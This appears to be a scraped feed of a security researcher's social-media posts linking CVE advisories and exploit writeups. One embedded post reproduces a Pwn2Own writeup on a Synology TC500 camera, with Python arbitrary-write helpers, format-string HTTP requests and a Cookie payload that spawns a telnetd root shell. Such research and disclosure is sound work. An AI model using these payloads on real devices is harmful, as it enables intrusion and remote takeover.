Marco Ivaldi

Funny magic cadrant ;-)

Finally a useful magic quadrant

Thanks to @wendynather for the discovery.

#cybersecurity #vulnerability

A top-level overview of the presentation presented as a grid of thumbnails, showing 42 slides.

Thank you to everyone who made it out for my DEF CON 33 presentation, "Shaking Out Shells With SSHamble", you can find the materials online at https://hdm.io/decks/MOORE%20-%20Shaking%20Out%20Shells%20With%20SSHamble.pdf

This deck includes some […]

[Original post on infosec.exchange]

If you want an ebook of some public domain work, either:

1. Check standardebooks.org before Gutenberg. They clean up books from Gutenberg with sane typography and print design.

2. Consider buying a "Dover Thrift Editions" version of the ebook. Many fly-by-night ebook "publishers" are turning a […]

Full screenshot of https://lumendatabase.org/notices/54378675

#TIL that last month some dimwits at Ventegus Anti-Piracy GmbH (likely on behalf of Hex-Rays?) submitted a #DMCA (Copyright) Complaint to #Google to remove these two pages from search results:

https://0xdeadbeef.info/augur/augur/ […]

[Original post on infosec.exchange]

CVE-2025-48708: #ghostscript can embed plaintext #password in encrypted #PDFs 😶

https://www.openwall.com/lists/oss-security/2025/05/23/2

Another elegant #vulnerability #advisory by @qualys that was published a few months back

Local information disclosure in #apport and #systemd- #coredump
(CVE-2025-5054 and CVE-2025-4598)

https://www.qualys.com/2025/05/29/apport-coredump/apport-coredump.txt

FiberGateway GR241AG - Full Exploit Chain During the year of 2023 I’ve identified that it was possible to obtain full control of the FiberGateway GR241AG router (root access), provided by a Portuguese ISP (Meo), via the public wifi network “MEO WiFi”. This wifi network is enabled by default and can only be disabled by contacting the ISP support. More than 1.600.000 households were affected by the identified vulnerabilities.

Another fun #vulnerability writeup with a cool tcpdump GTFOBin trick

#FiberGateway GR241AG - Full #Exploit Chain

https://r0ny.net/FiberGateway-GR241AG-Full-Exploit-Chain/

CVE 2025 31200 Background On April 16, 2025, Apple released a patch for a bug in CoreAudio which they said was “Actively exploited in the wild.” This flew under the radar a bit. Epsilon’s blog has a great writeup of the other bug that was presumably exploited in this chain: a bug in RPAC. The only thing out there that I am aware of about the CoreAudio side of the bug is a video by Billy Ellis (it’s great.

CVE 2025 31200 #Apple #CoreAudio #vulnerability analysis 🤯

https://blog.noahhw.dev/posts/cve-2025-31200/

Hypervisors for Memory Introspection and Reverse Engineering Introduction

#Rust #Hypervisors for Memory Introspection and #ReverseEngineering

https://secret.club/2025/06/02/hypervisors-for-memory-introspection-and-reverse-engineering.html

https://github.com/memN0ps/illusion-rs

https://github.com/memN0ps/matrix-rs

Turin's radio tower with radome and radio bridge. Apparently this is used by the national TV broadcasters as a high capacity link for TV and radio, not as a radar for the Caselle Airport as I initially thought

#torino #turin #italy #moon #astro #radio #tower #radome

CVE-2024-12718: Path Escape via Python’s tarfile Extraction Filters

@disasmwinnie yeah, see also for additional details https://www.upwind.io/feed/cve-2024-12718-path-escape-via-pythons-tarfile-extraction-filters

TarFile.extractall(..., filter='tar') arbitrary file chmod · Issue #127987 · python/cpython TarFile.extractall() can be tricked into chmodding arbitrary file (outside of the destination directory) to 0755, despite using filter='tar': $ target=$(mktemp) $ defeatpep706 eggs.tar $target $ ls...

Another fresh #Python #tarfile #vulnerability

Python TarFile.extractall(..., filter='tar') arbitrary file chmod

https://github.com/python/cpython/issues/127987

A nice series of inspiring logic #bugs! I somewhat pioneered timing leaks and it doesn’t surprise me at all that they are still around and kicking by the way ⏱️

Cracking the Vault: how we found zero-day flaws in authentication, identity, and authorization in #HashiCorp Vault […]

Exploiting the Synology TC500 at Pwn2Own Ireland 2024 Table of Contents Toggle * Introduction * Attack Surface * Exploitation * Information Leak Primitive * Stack Write Primitive * Arbitrary Write Primitive * Arbitrary Read Primitive * Getting a Remote Shell * Conclusion # Introduction In October 2024, InfoSect participated in Pwn2Own – a bug bounty competition against embedded devices such as cameras, NAS’, and smart speakers. In this blog, I’ll discuss our exploit we developed to get remote code execution on the Synology TC500 smart camera using a format string vulnerability. In the end, we weren’t able to use the exploit, but it was an interesting case study in exploiting format string vulnerabilities. # Attack Surface The firmware of the camera is publicly available, and it is possible to run it in an emulated environment using a similar setup to the 6th Real World CTF. From emulation, we enumerated the attack surface of the camera, one interface open to the LAN-side is the webd binary, which is used for logging in and managing the camera. The other open port is the RTSP management process, `streamd`. $ netstat -plantu Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp    0     0     0.0.0.0:443    0.0.0.0:*    LISTEN    770/webd tcp    0     0     0.0.0.0:554    0.0.0.0:*    LISTEN    847/streamd tcp    0     0     0.0.0.0:80     0.0.0.0:*    LISTEN    770/webd tcp    0     0     :::554         :::*         LISTEN    847/streamd udp    0     0     0.0.0.0:19998  0.0.0.0:*              770/webd The `webd` binary is a variant of the open-source civetweb web-server, with minor modifications made for debugging, logging, and to process interactions with the RTSP service. It runs on 32-bit ARM. The service is compiled with the normal set of application security mitigations: PIE, RELRO, ASLR, and stack canaries. It uses glibc v2.30. The Vulnerability While reverse engineering `webd`, we discovered that there are some minor customisations made to `process_new_connection`. This function is called by each worker thread to process an incoming HTTP request. One addition by Synology appears to be a global debug information table, containing information of each worker thread, and their most recently processed connections. At the end of `process_new_connection` the information about the request is added to a `thread_name` via `snprintf`. req_uri = conn->request_info.request_uri; ... char thread_name[0x80]; mg_snprintf(0, nullptr, thread_name, 0x80, "%s%s", ..., req_uri); This `thread_name` is then appended to the `worker_debug_table` using `set_thread_name` if (worker_debug_table != 0)     set_thread_name(pthread_self(), thread_name); In `set_thread_name`, however, the inputted `thread_name` is used as the sole argument to to `mg_snprintf`, meaning there’s a format string vulnerability where the the original `request_uri` will be used directly in `snprintf`. void set_thread_name(pthread_t self, char* thread_name) {     ...     if (worker_debug_table[i]->thread == self)     {         mg_snprintf(0, nullptr, worker_debug_table[i]->name, 0x80, thread_name);         worker_debug_table[i]->name[strlen(thread_name)] = 0;     }     ... } # Exploitation ## Information Leak Primitive The thread name in the `worker_debug_table` is not returned to remote user, so we could not directly use a URI like `%p%p%p%p` to fetch pointers from the stack. However, examining the state of the stack at the vulnerable `snprintf` gave insight to a potential information leak. pwndbg> telescope ... 07:001c| 0x7588268c -> 0x75500610 <- 0x312e31 /* '1.1' */ The seventh entry in the stack is a pointer to a string containing the HTTP version used in the request. This means that we could use the bug to overwrite the pointer, using a url which looks like: `%*[some_stack_entry_index]$c%7$n`. This format string works in two parts: • `%*[some_stack_entry_index]$c` will take a positional argument, and write that many characters from the stack. • `%7$n` will count the total bytes written so-far in the format string, and write it into the 7th positional argument (which is the 7th stack pointer in our case). For example, if we had the below C code, 3 bytes would be written, meaning `x` would be updated to 3 int x; printf("%*3$c%7$n", "abcdefghijklmn", NULL, 3, NULL, NULL, NULL, &x); Using this format, we can write a pointer over the HTTP version string, which will be returned to us, causing an ASLR bypass. The limitation of this technique is that it isn’t possible to write more than ~0x60000000 bytes on this this particular architecture and glibc version. This means that we cannot write a full pointer that isn’t in the executable, which is around the 0x50000000-0x60000000 address range. ## Stack Write Primitive We can use a similar technique with a custom length string to overwrite any pointer in the stack. The format string must look like `%[some-value]c%[some_stack_index]$n`. We can write either 32, 16, or 8 bits using `%n`, `%hn`, `%hhn` respectively. ## Arbitrary Write Primitive It is possible to pivot the stack write primitive into arbitrary write by updating a stack pointer to point to itself. At the offset of 3664 on the stack, there is a pointer back to the stack. We shall refer to this pointer as `p1`. `p1` can be made to point to another stack pointer, `p2` ,0x10 bytes further into the stack. pwndbg> tele $sp+3664 00:0000| 0x758834c0 <- 0x758834c0 ## p1 ... 04:0010| 0x758834d0 -> 0x75882e68 ## p2 <- 0x5f715ee8 After overwriting this offset using `%hhn` , we can change this as below. pwndbg> tele $sp+3664 00:0000| 0x758834c0 -> 0x758834d0 ## p1 -> 0x75882e68 ## p2<- 0x5f715ee8 04:0010| 0x758834d0 -> 0x75882e68 ## p2 <- 0x5f715ee8 These pointers are so deep in the stack of the worker thread that the pointer changes persist across multiple requests. We are now able to update a stack pointer to an arbitrary address by updating `p2` via `p1`, then write content to that arbitrary address by updating the content of `p2`. Using `p1` it is possible to make `p2` point to the offset 2080 in the stack. This region is effectively unused, allowing changes to that area to persist across requests too. We will refer to a pointer to this area as `p3`. So now we have `p2` pointing to `p3`, and we can incrementally update `p3` by updating the last byte of `p2` before overwriting the content of `p3`. This allows us to create an arbitrary pointer at `p3`. Then we can use the same technique as the stack write using the stack index of `p3`. The code for an 8-bit arbitrary write primitive looks as below def stack_write8(offset, value):     entry = offset // 4     if len(CLIENT_IP) + 1 > value:         value += 0x100     req = b'GET /%' + str(value - len(CLIENT_IP) - 1).encode() + b'c%' +     str(entry).encode() + b'$hhn HTTP/1.1\r\n\r\n'     print(req)     do_request(req) def arb_write8(addr, value): # Point to offset 2080 by updating p2's last byte to 0x90     stack_write8(p1, 0x90) # Write the last byte of the address to p2 (which is pointing to p3)     stack_write8(p2, addr & 0xFF) # Increment p2 by one byte     stack_write8(p1, 0x91) # Write 2nd byte of address to p2     stack_write8(p2, (addr >> 8) & 0xFF) # repeat until all bytes are written     stack_write8(p1, 0x92)     stack_write8(p2, (addr >> 16) & 0xFF)     stack_write8(p1, 0x93)     stack_write8(p2, (addr >> 24) & 0xFF)     if len(CLIENT_IP) + 1 > value:         value += 0x100     req = b'/%' + str(value - len(CLIENT_IP) - 1).encode() + b'c%' + str(OFFSET_STACK_DATA // 4).encode() + b'$hhn'     return do_request(b'GET %s HTTP/1.1\r\n\r\n' % req ## Arbitrary Read Primitive We can combine the arbitrary write primitive with the information leak primitive to create an arbitrary read. We simply need to update the `http_version` string used in the information leak to an arbitrary address, and make a request. This will return whatever the content of the arbitrary address happens to be. ## Getting a Remote Shell Gaining a remote shell relies on the fact that glibc 2.30 uses “hooks” for various libc APIs. The broad strategy we used was to overwrite the `__free_hook` with the `system()` hook, and call `free()` with a pointer to a controlled string as the first argument. Firstly, using our information leak, we are able to determine the PIE base, and therefore the address of the `.got` . The `.got` contains the addresses of functions in glibc such as ` system` , ` malloc` , and ` free` . Using the information in the `.got`, it is possible to find base address of glibc. This gives us the address of the ` __free_hook` hook. We can then use the arbitrary write primitive to overwrite the ` __free_hook` hook with the system. Next, it is possible to force webd to call ` free` (which is now ` system`) on a controlled string with the ` Cookie` http header. The function at ` 0x34a54` , which we have called ` GetSessionIdFromCookie`, will create a ` std::string` from the cookie value. int32_t* GetSessionIdFromCookie(int32_t* arg1, struct mg_request_info*arg2) {     int32_t num_headers = arg2->num_headers     ...     if (num_headers <= 0)         ...     else         ...     while (true)         if (strcmp(p1: arg2->headers[i_2].name, p2: "Cookie") == 0)             char* cookie = arg2->headers[i_2].value             if (cookie != 0)                 ....                 std::string::_M_construct<char const*>(&delim, "; ", &data_afee8[2])                 std::vector<std::string> split_cookie                 SplitStr(ret: &split_cookie, &cookie_1, &delim) // [1]                 ...                 std::vector<std::string> split_cookie_1 = split_cookie                 ...             else                 while (true)                     cookie_1 = &var_3c                     std::string::_M_construct<char const*>(&cookie_1, "=", &data_ab95c[9])                     SplitStr_2(&var_8c, &split_cookie_1[2], &cookie_1)                     void* cookie_3 = cookie_1                     if (cookie_3 != &var_3c) // [2]                      operator delete(ptr: cookie_3) } At ` [1]` , the function splits the cookie by a semicolon delimiter, storing the vector in ` split_cookie` . Then, at ` [2]`, the function will delete the cookie up to the semicolon. Therefore, we can send a cookie with the content: Cookie: telnetd -p 1337 -l /bin/sh -F; AAAAAAA After this is split, the telnetd command will be used by `system()` when it is freed. # Conclusion This exploit technique worked perfectly against the vulnerable TC500 firmware. However, the night before we flew out to Ireland to submit the exploit, Synology rolled out a firmware update which patched out the format string vulnerability. That’s the Pwn2Own experience for you…. If you want to read about another exploit for this same bug, Baptiste MOINE has a great writeup for Synology ### Share this: * Click to share on X (Opens in new window) X * Click to share on Facebook (Opens in new window) Facebook * ### Like this: Like Loading... ### _Related_

I 💚 format string #bugs! 🐞

Exploiting the #Synology TC500 at #Pwn2Own Ireland 2024 by @infosect

https://blog.infosectcbr.com.au/2025/08/01/exploiting-the-synology-tc500-at-pwn2own-ireland-2024/

@FritzAdalis ohh happy to see I’m not the only one who read it this way 😅

Python - Tarfile Realpath Overflow Vulnerability ### Summary Python's `TarFile.extractall()` and `TarFile.extract()` methods support a feature that allows a filter to be set to improve the safety of using these methods. Python's standard library...

A couple other fun bugs 🐛

#Python - #Tarfile Realpath Overflow #Vulnerability
https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f

#Python #Tar Filter Bypass #Vulnerability
https://github.com/google/security-research/security/advisories/GHSA-7fj8-pjw2-r9vh

A depiction of the exploit chain

Here’s another fun one by @snyk! I’ve really enjoyed the clever building of the #exploit chain ✊

Abusing #Ubuntu 24.04 features for root privilege escalation

https://labs.snyk.io/resources/abusing-ubuntu-root-privilege-escalation/

A couple notable related writeups

A great primer on #dbus and #polkit that clearly shows how brittle they are
https://u1f383.github.io/linux/2025/05/25/dbus-and-polkit-introduction.html

An amazing #linux #kernel #vulnerability research and #exploit development writeup […]

Still catching up with older writeups… Loved this one by @qualys ✊

CVE-2025-6018: #LPE from unprivileged to allow_active in *SUSE 15's #PAM
CVE-2025-6019: #LPE from allow_active to root in #libblockdev via #udisks

https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt

GitHub - 0xdea/semgrep-rules: A collection of my Semgrep rules to facilitate vulnerability research. A collection of my Semgrep rules to facilitate vulnerability research. - 0xdea/semgrep-rules

Always happy news to see my work spark new joy. In this case, my @semgrep ruleset at https://github.com/0xdea/semgrep-rules. Congrats to @trailofbits and best wishes for a wonderful career to Will 👍
https://infosec.exchange/@trailofbits/114975919399280105

CVE-2025-4660: Forescout SecureConnector RCE Learn about the high-risk RCE vulnerability in Forescout SecureConnector allows attackers to turn security agents into C2 channels.

Yet another example of a “security product” causing more harm than good 🤦

CVE-2025-4660: #Forescout SecureConnector #RCE

https://www.netspi.com/blog/technical-blog/red-teaming/cve-2025-4660-forescout-secureconnector-rce/

Pre-Auth SQL Injection to RCE - Fortinet FortiWeb Fabric Connector (CVE-2025-25257) Welcome back to yet another day in this parallel universe of security. This time, we’re looking at Fortinet’s FortiWeb Fabric Connector. “What is that?” we hear you say. That's a great question; no one knows. For the uninitiated, or unjaded; Fortinet’s FortiWeb Fabric Connector is meant to

Catching up with older writeups, this one stands out for #exploitation

Pre-Auth SQL Injection to RCE - #Fortinet FortiWeb Fabric Connector (CVE-2025-25257)

https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/

Exploiting zero days in abandoned hardware We successfully exploited two discontinued network devices at DistrictCon’s inaugural Junkyard competition in February, winning runner-up for Most Innovative Exploitation Technique. Our exploit chains demonstrate why end-of-life hardware poses persistent security risks.

Embedded device #hacking 101 💚

#Exploiting #0days in abandoned #hardware by @trailofbits

https://blog.trailofbits.com/2025/07/25/exploiting-zero-days-in-abandoned-hardware/

I love this kind of #bugs, especially when they are features 🤣

#arm64: Linear mapping is mapped at the same static virtual address

https://project-zero.issues.chromium.org/issues/434208461

Today, I’m celebrating 1000 days in the #fediverse! Happy to have found such a wonderful home 🥳 :1000:

My pwn.college hacking activity dashboard showing a 57 day streak

Not long ago I posted about https://pwn.college. I got hooked up with it myself, and I almost got my yellow belt 💛 almost, ‘cause I still have some of the earlier/easier challenges left 😅 I’ll tackle them after the holidays 🏝️ before looking at the more […]

[Original post on infosec.exchange]

“Beginning today, within one week of reporting a vulnerability to a vendor, we will publicly share that a vulnerability was discovered.

We will share:
The vendor or open-source project that received the report.
The affected product.
The date the report was filed, and when the 90-day disclosure […]

In our last post, @apps3c shares some #PoCs of #GenAI/ #LLM security issues found in real-world assessments conducted for corporate clients, with a focus on #vulnerabilities that can be exploited to gain unauthorized access to data, resources, and services […]

Multiple serial offenders. Modems through the ages. A collection...

Multiple serial offenders. Modems through the ages. A collection...

These are all the modems I've owned, ranging from a 2400 baud Amstrad modem funded by working for and with Acorn, right up to my first DSL modem. Notable is the one in black, also a 2400 […]

[Original post on infosec.exchange]

“We are now living in a global state that has been structured for the benefit of non-human entities with non-human goals. They have enormous media reach, which they use to distract attention from threats to their own survival. They also have an enormous ability to support litigation against […]